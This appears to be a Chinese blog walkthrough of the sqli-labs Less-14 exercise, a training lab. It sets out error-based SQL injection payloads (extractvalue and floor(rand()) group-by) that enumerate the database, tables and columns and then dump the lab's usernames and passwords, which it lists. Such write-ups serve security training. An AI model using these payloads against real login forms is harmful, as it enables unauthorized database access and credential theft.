Less(14)POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

1.成功登入,没有显示成功登录的回显

  

 

 2.报错型注入:extractvalue()

  (1)爆库:uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and "  &passwd=admin&submit=Submit

    

  (2)爆表:uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and "  &passwd=admin&submit=Submit

    

  (3)爆列名:uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))  and "  &passwd=admin&submit=Submit

    

 

     显示出一些列名:但是这些都不是我们所需要的,所以用 not in() 让前面不用的去掉,把后面所隐藏的我们需要的部分显示出来:uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login'))))  and "  &passwd=admin&submit=Submit

    

  (4)爆值:uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))  and "  &passwd=admin&submit=Submit

    

 

     把一些已经显示出来的用户和密码记下来,然后用 not in() 把后面没有显示出来的用户和密码,显示出来:

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

 

3.时间型盲注

  这个效率比较低,所以时间盲注就看之前的吧

 

4.也可以用聚合函数:但是具有随机性

  (1)爆库:uname=" union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a #  &passwd=admin&submit=Submit

    

  (2)爆表:uname=" union select count(*),concat(0x3a,0x3a,(select table_name),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a #  &passwd=admin&submit=Submit

    

  (3)爆列名:弄到这步,就爆不出来了,所以建议使用报错法

posted @ 2020-02-11 18:50  孟雨  阅读(253)  评论(0编辑  收藏  举报